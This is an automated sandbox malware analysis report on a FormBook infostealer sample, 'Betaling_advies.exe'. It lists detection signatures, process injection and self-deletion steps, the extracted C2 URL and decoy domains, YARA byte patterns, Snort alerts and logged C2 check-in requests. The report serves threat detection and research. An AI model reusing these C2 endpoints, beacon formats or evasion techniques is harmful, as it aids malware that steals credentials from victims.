Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report Betaling_advies.exe

Overview

General Information

Sample Name:Betaling_advies.exe
Analysis ID:383925
MD5:5011945cdee260fb8688b06568d007b3
SHA1:c0e27a58017d0cf737b86ff3ced063d120f7badd
SHA256:96bd9ed85e93c31a337a92e99fd6e1966f68f1a28fef43a21da725c36405988c
Tags:exeFormbookgeoNLD
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Contains functionality to prevent local Windows debugging
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • Betaling_advies.exe (PID: 6992 cmdline: 'C:\Users\user\Desktop\Betaling_advies.exe' MD5: 5011945CDEE260FB8688B06568D007B3)
    • Betaling_advies.exe (PID: 7028 cmdline: 'C:\Users\user\Desktop\Betaling_advies.exe' MD5: 5011945CDEE260FB8688B06568D007B3)
      • explorer.exe (PID: 3424 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • colorcpl.exe (PID: 6548 cmdline: C:\Windows\SysWOW64\colorcpl.exe MD5: 746F3B5E7652EA0766BA10414D317981)
          • cmd.exe (PID: 5804 cmdline: /c del 'C:\Users\user\Desktop\Betaling_advies.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5792 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.werealestatephotography.com/hw6d/"], "decoy": ["medicare101now.com", "danahillathletics.com", "realjobexpert.com", "boulderhalle-hamburg.com", "idoweddinghair.com", "awdcompanies.com", "thevillaflora.com", "neutrasystems.com", "allwest-originals.com", "designtehengsg.com", "thenewyorker.computer", "ladybugtubs.com", "silina-beauty24.com", "mifangtu.com", "fashionbranddeveloper.com", "istanbulhookah.com", "askyoyo.com", "osaka-computer.net", "conegenie.com", "agteless.com", "carsoncredittx.com", "wellalytics.com", "onjulitrading.com", "thelocallawnmen.com", "loanascustomboutique.com", "ohcaftanmycaftan.com", "ardor-fitness.com", "benzinhayvancilik.com", "apthaiproperty.com", "maxim.technology", "dfch18.com", "davaoaffordablecondo.com", "sueshemp.com", "missmaltese.com", "lakecountrydems.com", "lastminuteminister.com", "sofiascelebrations.com", "socialaspecthouston.com", "rechnung.pro", "kathyscrabhouse.com", "themusasoficial.com", "reversemortgageloanmiami.com", "vrventurebsp.com", "whatalode.com", "xh03.net", "qiqihao.site", "specstrii.com", "organicfarmteam.com", "codebinnovations.net", "kizunaservice.com", "lboclkchain.com", "frorool.com", "dpok.network", "desafogados.com", "vestblue.net", "forguyshere.com", "recordprosperity.info", "theballoonbirds.com", "adityabirla-loan.com", "midgex.info", "qishuxia.com", "panopticop.com", "gd-kangda.com", "hotelbrainclub.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000001.650199576.0000000000400000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000001.00000001.650199576.0000000000400000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000001.00000001.650199576.0000000000400000.00000040.00020000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166a9:$sqlite3step: 68 34 1C 7B E1
    • 0x167bc:$sqlite3step: 68 34 1C 7B E1
    • 0x166d8:$sqlite3text: 68 38 2A 90 C5
    • 0x167fd:$sqlite3text: 68 38 2A 90 C5
    • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
    00000001.00000002.691540714.00000000009C0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000001.00000002.691540714.00000000009C0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 16 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      0.2.Betaling_advies.exe.2680000.1.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        0.2.Betaling_advies.exe.2680000.1.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x13885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x13371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x13987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x858a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x125ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9302:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18977:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19a1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        0.2.Betaling_advies.exe.2680000.1.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x158a9:$sqlite3step: 68 34 1C 7B E1
        • 0x159bc:$sqlite3step: 68 34 1C 7B E1
        • 0x158d8:$sqlite3text: 68 38 2A 90 C5
        • 0x159fd:$sqlite3text: 68 38 2A 90 C5
        • 0x158eb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15a13:$sqlite3blob: 68 53 D8 7F 8C
        0.2.Betaling_advies.exe.2680000.1.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          0.2.Betaling_advies.exe.2680000.1.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 13 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Antivirus detection for URL or domainShow sources
          Source: http://www.specstrii.com/hw6d/?DnbLu=IiUUmeNwmzZIwBY6jv8olF4RAcLcRfzkTrlXtYyMQXecYFYW1rp8TEFuPJqz5eLrlk+J&EzuxZl=3fX4qpLxXJuAvira URL Cloud: Label: malware
          Found malware configurationShow sources
          Source: 00000001.00000001.650199576.0000000000400000.00000040.00020000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.werealestatephotography.com/hw6d/"], "decoy": ["medicare101now.com", "danahillathletics.com", "realjobexpert.com", "boulderhalle-hamburg.com", "idoweddinghair.com", "awdcompanies.com", "thevillaflora.com", "neutrasystems.com", "allwest-originals.com", "designtehengsg.com", "thenewyorker.computer", "ladybugtubs.com", "silina-beauty24.com", "mifangtu.com", "fashionbranddeveloper.com", "istanbulhookah.com", "askyoyo.com", "osaka-computer.net", "conegenie.com", "agteless.com", "carsoncredittx.com", "wellalytics.com", "onjulitrading.com", "thelocallawnmen.com", "loanascustomboutique.com", "ohcaftanmycaftan.com", "ardor-fitness.com", "benzinhayvancilik.com", "apthaiproperty.com", "maxim.technology", "dfch18.com", "davaoaffordablecondo.com", "sueshemp.com", "missmaltese.com", "lakecountrydems.com", "lastminuteminister.com", "sofiascelebrations.com", "socialaspecthouston.com", "rechnung.pro", "kathyscrabhouse.com", "themusasoficial.com", "reversemortgageloanmiami.com", "vrventurebsp.com", "whatalode.com", "xh03.net", "qiqihao.site", "specstrii.com", "organicfarmteam.com", "codebinnovations.net", "kizunaservice.com", "lboclkchain.com", "frorool.com", "dpok.network", "desafogados.com", "vestblue.net", "forguyshere.com", "recordprosperity.info", "theballoonbirds.com", "adityabirla-loan.com", "midgex.info", "qishuxia.com", "panopticop.com", "gd-kangda.com", "hotelbrainclub.com"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: Betaling_advies.exeReversingLabs: Detection: 14%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000001.00000001.650199576.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.691540714.00000000009C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.654811569.0000000002680000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.910277347.0000000002530000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.690806042.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.692667485.0000000000D40000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.909643904.0000000000320000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0.2.Betaling_advies.exe.2680000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Betaling_advies.exe.2680000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Betaling_advies.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.Betaling_advies.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.Betaling_advies.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Betaling_advies.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: 7.2.colorcpl.exe.4bd7960.5.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 7.2.colorcpl.exe.2972508.2.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 0.2.Betaling_advies.exe.2680000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.2.Betaling_advies.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.1.Betaling_advies.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: Betaling_advies.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: Binary string: C:\xampp\htdocs\Cryptor\74d81a217a414a2aaee1ac9ce14525a2\Loader\Loader\Release\22ct3mhbr.pdb source: Betaling_advies.exe, 00000000.00000002.654453331.0000000000788000.00000004.00020000.sdmp, 571kzkbal.dll.0.dr
          Source: Binary string: colorcpl.pdbGCTL source: Betaling_advies.exe, 00000001.00000002.692704063.0000000000D70000.00000040.00000001.sdmp
          Source: Binary string: colorcpl.pdb source: Betaling_advies.exe, 00000001.00000002.692704063.0000000000D70000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000004.00000000.666885783.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: Betaling_advies.exe, 00000000.00000003.646799474.000000001EEB0000.00000004.00000001.sdmp, Betaling_advies.exe, 00000001.00000002.692105049.0000000000B2F000.00000040.00000001.sdmp, colorcpl.exe, 00000007.00000002.910878162.00000000047BF000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: Betaling_advies.exe, colorcpl.exe
          Source: Binary string: wscui.pdb source: explorer.exe, 00000004.00000000.666885783.0000000005A00000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 0_2_00405301 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 0_2_00405C94 SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 0_2_004026BC FindFirstFileA,

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49756 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49756 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49756 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49763 -> 52.128.23.153:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49763 -> 52.128.23.153:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49763 -> 52.128.23.153:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49771 -> 156.241.53.253:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49771 -> 156.241.53.253:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49771 -> 156.241.53.253:80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.werealestatephotography.com/hw6d/
          Source: global trafficHTTP traffic detected: GET /hw6d/?DnbLu=9ueW5jgNjqHYG2FKt2LGoCq6SuP7mnM61J0YxzvwfvA6U9wxZN+9uCYbtAS/FF4JJope&EzuxZl=3fX4qpLxXJu HTTP/1.1Host: www.allwest-originals.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hw6d/?DnbLu=g+1Vjsk4w8x2RD/Kt8Hxup0r2HreN3Gf6VbT6qUlKeSViUJ1r397pmudv9cb4ekjB+95&EzuxZl=3fX4qpLxXJu HTTP/1.1Host: www.kathyscrabhouse.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hw6d/?DnbLu=Vm8u5YrjxPUHM0A3kvgMiq/IEeemHw6XN/VHMXEVDOFWtOJ88rOTM1/2OfHHahCysW3o&EzuxZl=3fX4qpLxXJu HTTP/1.1Host: www.ladybugtubs.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hw6d/?DnbLu=D7dtfgb1ASpTWXzDTTkBm63TDYSh3Sz8xx3t4TS2wXC5rygslUZX2+E35rBVQjv7JKAU&EzuxZl=3fX4qpLxXJu HTTP/1.1Host: www.organicfarmteam.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hw6d/?DnbLu=eQ0CjYjVQ3ZWFLT9z9t5AWcWjesy46k9o3/PiW4fNWDoBcoO4PdNNvWWcbIpStJgY1Xn&EzuxZl=3fX4qpLxXJu HTTP/1.1Host: www.neutrasystems.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hw6d/?DnbLu=IiUUmeNwmzZIwBY6jv8olF4RAcLcRfzkTrlXtYyMQXecYFYW1rp8TEFuPJqz5eLrlk+J&EzuxZl=3fX4qpLxXJu HTTP/1.1Host: www.specstrii.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hw6d/?DnbLu=k1LpsGxm5HumkAXpmo5e4u//lFYytVV7DtC0wIWjSrCd2GK6ua7omZNXnIaR8+O4hW3P&EzuxZl=3fX4qpLxXJu HTTP/1.1Host: www.boulderhalle-hamburg.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hw6d/?DnbLu=Y1unV92ZJUSuuBS+wJtUBQ3HA2/A73jU4dZUG/XKFhicVa7REK6SIV0eE0B/9G03nb8G&EzuxZl=3fX4qpLxXJu HTTP/1.1Host: www.thenewyorker.computerConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hw6d/?DnbLu=JJCdylcTzsLZbxD+F44msifm3t5O58VGmPPtm/HjqScxgR1v9JyEBvOVGIsgPNAdlWCx&EzuxZl=3fX4qpLxXJu HTTP/1.1Host: www.osaka-computer.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hw6d/?DnbLu=um+iqA/SlswPLY/3czDk0wl6oY0PgWYbosSPlOYlzmcZrAL5djGLa7ExvPa80BRt3GVX&EzuxZl=3fX4qpLxXJu HTTP/1.1Host: www.werealestatephotography.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hw6d/?DnbLu=PD6zFQZ0feRnIFnqRgwh7WYr9HBCLrLQfeEKpwQ3SsDBQ385jeUvmpjltj5zrHZAx7on&EzuxZl=3fX4qpLxXJu HTTP/1.1Host: www.dfch18.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 198.54.117.218 198.54.117.218
          Source: Joe Sandbox ViewIP Address: 52.128.23.153 52.128.23.153
          Source: Joe Sandbox ViewASN Name: DOSARRESTUS DOSARRESTUS
          Source: Joe Sandbox ViewASN Name: NOCIXUS NOCIXUS
          Source: global trafficHTTP traffic detected: GET /hw6d/?DnbLu=9ueW5jgNjqHYG2FKt2LGoCq6SuP7mnM61J0YxzvwfvA6U9wxZN+9uCYbtAS/FF4JJope&EzuxZl=3fX4qpLxXJu HTTP/1.1Host: www.allwest-originals.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hw6d/?DnbLu=g+1Vjsk4w8x2RD/Kt8Hxup0r2HreN3Gf6VbT6qUlKeSViUJ1r397pmudv9cb4ekjB+95&EzuxZl=3fX4qpLxXJu HTTP/1.1Host: www.kathyscrabhouse.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hw6d/?DnbLu=Vm8u5YrjxPUHM0A3kvgMiq/IEeemHw6XN/VHMXEVDOFWtOJ88rOTM1/2OfHHahCysW3o&EzuxZl=3fX4qpLxXJu HTTP/1.1Host: www.ladybugtubs.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hw6d/?DnbLu=D7dtfgb1ASpTWXzDTTkBm63TDYSh3Sz8xx3t4TS2wXC5rygslUZX2+E35rBVQjv7JKAU&EzuxZl=3fX4qpLxXJu HTTP/1.1Host: www.organicfarmteam.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hw6d/?DnbLu=eQ0CjYjVQ3ZWFLT9z9t5AWcWjesy46k9o3/PiW4fNWDoBcoO4PdNNvWWcbIpStJgY1Xn&EzuxZl=3fX4qpLxXJu HTTP/1.1Host: www.neutrasystems.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hw6d/?DnbLu=IiUUmeNwmzZIwBY6jv8olF4RAcLcRfzkTrlXtYyMQXecYFYW1rp8TEFuPJqz5eLrlk+J&EzuxZl=3fX4qpLxXJu HTTP/1.1Host: www.specstrii.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hw6d/?DnbLu=k1LpsGxm5HumkAXpmo5e4u//lFYytVV7DtC0wIWjSrCd2GK6ua7omZNXnIaR8+O4hW3P&EzuxZl=3fX4qpLxXJu HTTP/1.1Host: www.boulderhalle-hamburg.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hw6d/?DnbLu=Y1unV92ZJUSuuBS+wJtUBQ3HA2/A73jU4dZUG/XKFhicVa7REK6SIV0eE0B/9G03nb8G&EzuxZl=3fX4qpLxXJu HTTP/1.1Host: www.thenewyorker.computerConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hw6d/?DnbLu=JJCdylcTzsLZbxD+F44msifm3t5O58VGmPPtm/HjqScxgR1v9JyEBvOVGIsgPNAdlWCx&EzuxZl=3fX4qpLxXJu HTTP/1.1Host: www.osaka-computer.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hw6d/?DnbLu=um+iqA/SlswPLY/3czDk0wl6oY0PgWYbosSPlOYlzmcZrAL5djGLa7ExvPa80BRt3GVX&EzuxZl=3fX4qpLxXJu HTTP/1.1Host: www.werealestatephotography.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hw6d/?DnbLu=PD6zFQZ0feRnIFnqRgwh7WYr9HBCLrLQfeEKpwQ3SsDBQ385jeUvmpjltj5zrHZAx7on&EzuxZl=3fX4qpLxXJu HTTP/1.1Host: www.dfch18.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.allwest-originals.com
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 08 Apr 2021 10:39:11 GMTServer: Apache/2.4.46 (Unix)Content-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
          Source: explorer.exe, 00000004.00000000.672320729.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: explorer.exe, 00000004.00000000.655043939.0000000002B50000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000004.00000000.672320729.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000004.00000000.672320729.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000004.00000000.672320729.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000004.00000000.672320729.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000004.00000000.672320729.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000004.00000000.672320729.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000004.00000000.672320729.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
          Source: explorer.exe, 00000004.00000000.672320729.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000004.00000000.672320729.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000004.00000000.672320729.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000004.00000000.672320729.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000004.00000000.672320729.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000004.00000000.672320729.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000004.00000000.672320729.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000004.00000000.672320729.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000004.00000000.672320729.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000004.00000000.672320729.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000004.00000000.672320729.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: colorcpl.exe, 00000007.00000002.911472356.0000000004D52000.00000004.00000001.sdmpString found in binary or memory: http://www.litespeedtech.com/error-page
          Source: explorer.exe, 00000004.00000000.672320729.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000004.00000000.672320729.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000004.00000000.672320729.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
